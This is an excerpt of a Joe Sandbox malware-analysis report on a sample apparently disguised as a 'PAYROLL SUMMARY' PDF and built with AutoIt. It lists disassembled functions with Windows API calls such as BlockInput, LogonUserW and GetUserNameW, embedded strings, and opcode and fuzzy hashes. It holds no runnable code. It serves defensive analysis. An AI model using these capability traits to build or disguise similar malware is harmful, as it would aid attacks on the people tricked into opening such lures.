Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa5986d9bdd44b58e5de6d31e182df707e97d2fa45c508003d4ba0cf8e1f78dc
Instruction ID: 8b9741144a4ee15cb32387397f151b3c1e97675f98d607cfff726cc24794ac56
Opcode Fuzzy Hash: fa5986d9bdd44b58e5de6d31e182df707e97d2fa45c508003d4ba0cf8e1f78dc
Instruction Fuzzy Hash: 36320421D7DF424DD7639634E976336A248AFB73C8F15D73BE819B99A6EB3884834100

Function 0028267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb1a77e857704eb8317ded26f6d4ef54ff8e0ff63962f43b603ad1f6456298e
Instruction ID: e46e1b59e984e673e838245b48413fc9c48dd7b18658b27e26f4a78e91a6ec1f
Opcode Fuzzy Hash: 4eb1a77e857704eb8317ded26f6d4ef54ff8e0ff63962f43b603ad1f6456298e
Instruction Fuzzy Hash: 92B12120D6AF804DD323A6399875336B74CAFBB2C5F52D31BFC2638D62EB2190834241

Function 002C41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 002C4218

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 58c47ba090b58bba86f401743c31a8a66b3040ee79834e6a88aa5c30081c97ec
Instruction ID: ea4199b147679b860f35d0d88244f486a31451b32f0d691012b759b447fd4860
Opcode Fuzzy Hash: 58c47ba090b58bba86f401743c31a8a66b3040ee79834e6a88aa5c30081c97ec
Instruction Fuzzy Hash: A9E012312601149FC710AF59D845E9AB7D8AF54761F00801AFC4AC7251DA70EC548BA5

Function 002B4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 002B4F18

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 6699ce699c5f55045f18141fd747c74dbffe12d8b706922d507974fe0c70b329
Instruction ID: 59356a08c6b853ecce2ebd906a6fb933aa0a383deb0f0c00974315156e1c9bca
Opcode Fuzzy Hash: 6699ce699c5f55045f18141fd747c74dbffe12d8b706922d507974fe0c70b329
Instruction Fuzzy Hash: B0D067A457460679E8186F20AC9FBF61209A3507D1F9459897202969C398E5B8A0A435

Function 002A8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002A88D1), ref: 002A8CB3

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: c3154eb5025181ffd8357e6ed18d04d79eb7b2920d6f94ebe49b0d21b7ae637e
Instruction ID: 28aae296ab75f9c3c1be57ebc8185d81a69417abbcb9d3fd3790941d82762fc5
Opcode Fuzzy Hash: c3154eb5025181ffd8357e6ed18d04d79eb7b2920d6f94ebe49b0d21b7ae637e
Instruction Fuzzy Hash: 3DD05E3226050EABEF018EA4ED05EAE3B69EB04B01F408111FE16C61A1C775D935AB60

Function 00292230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00292242

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: fc7ec68df081b38aedcdb6b62f41dad16ca816a332ffc8ba3ebc68fb1598d111
Instruction ID: f1b62df488ccb414509c7019112b4e245d67a32e79453c37f9912007d708191f
Opcode Fuzzy Hash: fc7ec68df081b38aedcdb6b62f41dad16ca816a332ffc8ba3ebc68fb1598d111
Instruction Fuzzy Hash: 91C04CF1C11109DBDB05DB90DA98DEE77BCAB04305F104056A102F2140D7749B548A71

Function 0027A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0027A36A

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 666793bc01bc300e0e8f2d42c25d927b36fc6c44582d057f1d7725a3a860d072
Instruction ID: 4ef6534a693a9a4c3f29c7bfdc7719f7bacd8f4e3908aa18c591c863a901c23a
Opcode Fuzzy Hash: 666793bc01bc300e0e8f2d42c25d927b36fc6c44582d057f1d7725a3a860d072
Instruction Fuzzy Hash: 80A0123000010CA7CA401B45FC084447F5CD6001907004061FC0D40021873258104584

Function 00268A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee937e9b35a10c20e32567adff04a797a3c79fbb39d79ba7efdeefaa9359255
Instruction ID: fb12cbe2fc4e840bceba2c989ba3aa3f25535592d70fd93ab799374b2a44fcdb
Opcode Fuzzy Hash: 5ee937e9b35a10c20e32567adff04a797a3c79fbb39d79ba7efdeefaa9359255
Instruction Fuzzy Hash: 13221730931627CBDF2C8F14C49467EB7A1EB42304F68866BD9429B2A1DF749DE1CB60

Function 00272405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 55dc55e53faa888554acdadee8b764a410b7a8ef6b47844b31629b09a8608a54
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 8BC194322261934ADB2D4E3D943503EBAE15EA27B131A875DE4BACB5C4EF30D538D620

Function 0027283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 58a4691652ad2d57ce424727ade7b0860515674208a63efb0eb5b718b54088cd
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 87C1C43222619349DB2D4E3E843113EBBE15EA27B131A576DE4BADB5C4EF30D5389620

Function 00271BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: bc5021476f91ad400d11b733b44c7a2132baa8c8a9a36e6a6a368c746b6840c5
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 26C174322261530ADF2D4E3E943503EBAE15EA27B131A875DE8BADB9D4EF30D534D610

Function 002C7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 002C7B70
DeleteObject.GDI32(00000000), ref: 002C7B82
DestroyWindow.USER32 ref: 002C7B90
GetDesktopWindow.USER32 ref: 002C7BAA
GetWindowRect.USER32(00000000), ref: 002C7BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 002C7CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 002C7D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7D4A
GetClientRect.USER32(00000000,?), ref: 002C7D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002C7D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7DF8
GlobalFree.KERNEL32(00000000), ref: 002C7E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,002E2CAC,00000000), ref: 002C7E2B
GlobalFree.KERNEL32(00000000), ref: 002C7E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 002C7E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 002C7E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C808F

Strings

static, xrefs: 002C7D8A, 002C7EE1
, xrefs: 002C8015
DISPLAY, xrefs: 002C7EF2
AutoIt v3, xrefs: 002C7D42

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: ae771f8fdbcfb4f3b3d50138cfffcff7a582b8f6565f00ebea17d5649c193b32
Instruction ID: b343039158586cc0040e8c8eb2da9c92997c35be90a435dc60a62e218405cefe
Opcode Fuzzy Hash: ae771f8fdbcfb4f3b3d50138cfffcff7a582b8f6565f00ebea17d5649c193b32
Instruction Fuzzy Hash: AD02AD71910109EFDB14DFA4DD89EAE7BB8EF48311F14855AF916AB2A0CB30AD11CF64

Function 002D37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,002DF910), ref: 002D38AF
IsWindowVisible.USER32(?), ref: 002D38D3

Strings

GETCURRENTCOL, xrefs: 002D3BB0
CHECK, xrefs: 002D3AF5
HIDEDROPDOWN, xrefs: 002D3988
GETCURRENTLINE, xrefs: 002D3B75
GETCURRENTSELECTION, xrefs: 002D3A6B
GETSELECTED, xrefs: 002D3B2B
UNCHECK, xrefs: 002D3B0B
ISENABLED, xrefs: 002D38F3
TABLEFT, xrefs: 002D390F
CURRENTTAB, xrefs: 002D3945
ADDSTRING, xrefs: 002D399E
EDITPASTE, xrefs: 002D3BE7
GETLINECOUNT, xrefs: 002D3B4E
GETLINE, xrefs: 002D3C23
ISVISIBLE, xrefs: 002D38BF
ISCHECKED, xrefs: 002D3AC1
TABRIGHT, xrefs: 002D3925
SHOWDROPDOWN, xrefs: 002D3968
SENDCOMMANDID, xrefs: 002D3C62
DELSTRING, xrefs: 002D39D1
FINDSTRING, xrefs: 002D39FE
SELECTSTRING, xrefs: 002D3A8E
SETCURRENTSELECTION, xrefs: 002D3A3E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 2b1191a1c51aa3c4f18f9d275381834e096cda893b02400d99086bda1ce5d2a4
Instruction ID: a0c9f1011fc3dffaad0fb33c59fc028d6fec170f59e56be71e9c96ce9ed2f3be
Opcode Fuzzy Hash: 2b1191a1c51aa3c4f18f9d275381834e096cda893b02400d99086bda1ce5d2a4
Instruction Fuzzy Hash: B9D18134234306DBCB14EF11C491A6AB7A5EF54344F14845AB8865B3E2CB71EE6ACF92

Function 002DA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 002DA89F
GetSysColorBrush.USER32(0000000F), ref: 002DA8D0
GetSysColor.USER32(0000000F), ref: 002DA8DC
SetBkColor.GDI32(?,000000FF), ref: 002DA8F6
SelectObject.GDI32(?,?), ref: 002DA905
InflateRect.USER32(?,000000FF,000000FF), ref: 002DA930
GetSysColor.USER32(00000010), ref: 002DA938
CreateSolidBrush.GDI32(00000000), ref: 002DA93F
FrameRect.USER32(?,?,00000000), ref: 002DA94E
DeleteObject.GDI32(00000000), ref: 002DA955
InflateRect.USER32(?,000000FE,000000FE), ref: 002DA9A0
FillRect.USER32(?,?,?), ref: 002DA9D2
GetWindowLongW.USER32(?,000000F0), ref: 002DA9FD

Part of subcall function 002DAB60: GetSysColor.USER32(00000012), ref: 002DAB99
Part of subcall function 002DAB60: SetTextColor.GDI32(?,?), ref: 002DAB9D
Part of subcall function 002DAB60: GetSysColorBrush.USER32(0000000F), ref: 002DABB3
Part of subcall function 002DAB60: GetSysColor.USER32(0000000F), ref: 002DABBE
Part of subcall function 002DAB60: GetSysColor.USER32(00000011), ref: 002DABDB
Part of subcall function 002DAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DABE9
Part of subcall function 002DAB60: SelectObject.GDI32(?,00000000), ref: 002DABFA
Part of subcall function 002DAB60: SetBkColor.GDI32(?,00000000), ref: 002DAC03
Part of subcall function 002DAB60: SelectObject.GDI32(?,?), ref: 002DAC10
Part of subcall function 002DAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 002DAC2F
Part of subcall function 002DAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DAC46
Part of subcall function 002DAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 002DAC5B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 23be6c2a599451fa011abe0ced6a2c899c13fc97c843b86cafbe1421a0e48898
Instruction ID: d2f012af22a32baa40523f3f21b0325a604e014ef359fe8196c1ede658723258
Opcode Fuzzy Hash: 23be6c2a599451fa011abe0ced6a2c899c13fc97c843b86cafbe1421a0e48898
Instruction Fuzzy Hash: 83A1AF72419302AFD7509F64ED0CE5B7BA9FF88321F104A2AF966962A0D770DD44CB52

Function 002C77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 002C77F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002C78B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002C78EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 002C7900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 002C7946
GetClientRect.USER32(00000000,?), ref: 002C7952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 002C7996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002C79A5
GetStockObject.GDI32(00000011), ref: 002C79B5
SelectObject.GDI32(00000000,00000000), ref: 002C79B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002C79C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002C79D2
DeleteDC.GDI32(00000000), ref: 002C79DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002C7A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 002C7A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 002C7A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002C7A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 002C7A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 002C7AAE
GetStockObject.GDI32(00000011), ref: 002C7AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002C7AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 002C7ACE

Strings

static, xrefs: 002C7990, 002C7AA8
msctls_progress32, xrefs: 002C7A4F
DISPLAY, xrefs: 002C799B
AutoIt v3, xrefs: 002C793E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: b1ed17ce4d36628925cbef1dd36cd8172f7972a8b227d998113090c532591d81
Instruction ID: 91dec428f103f9e074098ab4d0bad9a02e751243ce1c3ad4d27a9116a0de8e15
Opcode Fuzzy Hash: b1ed17ce4d36628925cbef1dd36cd8172f7972a8b227d998113090c532591d81
Instruction Fuzzy Hash: 2EA1AF71A10219BFEB109BA4DD4AFAE7BBDEB48711F008215FA15A72E0C770AD10CF64

Function 002BAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002BAF89
GetDriveTypeW.KERNEL32(?,002DFAC0,?,\\.\,002DF910), ref: 002BB066
SetErrorMode.KERNEL32(00000000,002DFAC0,?,\\.\,002DF910), ref: 002BB1C4

Strings

CDROM, xrefs: 002BB09A
SSD, xrefs: 002BB0F1
SAS, xrefs: 002BB170
Network, xrefs: 002BB0A4
RAMDisk, xrefs: 002BB090
Removable, xrefs: 002BB0B8
SCSI, xrefs: 002BB131
\\.\, xrefs: 002BAFDB
ATAPI, xrefs: 002BB138
Fixed, xrefs: 002BB0AE
iSCSI, xrefs: 002BB169
MMC, xrefs: 002BB185
ATA, xrefs: 002BB13F
SSA, xrefs: 002BB14D
SATA, xrefs: 002BB177
Virtual, xrefs: 002BB18C
1394, xrefs: 002BB146
FileBackedVirtual, xrefs: 002BB193
Fibre, xrefs: 002BB154
USB, xrefs: 002BB15B
Unknown, xrefs: 002BB086, 002BB12A
RAID, xrefs: 002BB162
PhysicalDrive, xrefs: 002BB012

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
